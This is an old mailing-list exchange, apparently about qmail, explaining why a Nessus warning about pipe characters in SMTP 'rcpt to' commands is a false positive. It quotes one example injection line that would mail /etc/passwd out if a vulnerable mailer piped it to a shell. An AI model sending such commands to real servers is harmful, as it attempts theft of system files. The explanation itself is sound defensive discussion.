On Sat, Jun 03, 2000 at 04:29:07AM +0000, Jim Breton wrote:
> On Fri, Jun 02, 2000 at 11:17:30PM -0500, Bob Waskosky wrote:
> > Is this a hole and how would I plug it?
>
>
> No it's not a hole. It would only be a security concern if your mailer
> were to allow the message to actually be piped directly to the program
> specified in the "rcpt to" command.
>
> Say for example I were to send this command:
>
> rcpt to: "|mail [EMAIL PROTECTED] < /etc/passwd"
>
> or something similar. And your MTA happily piped my message to that
> program, which also took /etc/passwd as input and mailed it to me at
> [EMAIL PROTECTED] _That_ would be a problem.
>
> With qmail however, pipe symbols are not treated specially and don't
> have the same meaning as they would in a shell. They are handled as
> though they are part of a username, and since you don't have a local
> user "|mail" the message is treated as any normal message to an unknown
> user.
>
> You don't need to change anything. :) Nessus assumes that because your
> mailer "accepted" the message, it will also deliver it in an "evil"
> way... which qmail won't do.
>
kewl. Thanks for the info.
--
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
-----------------------------------------------------
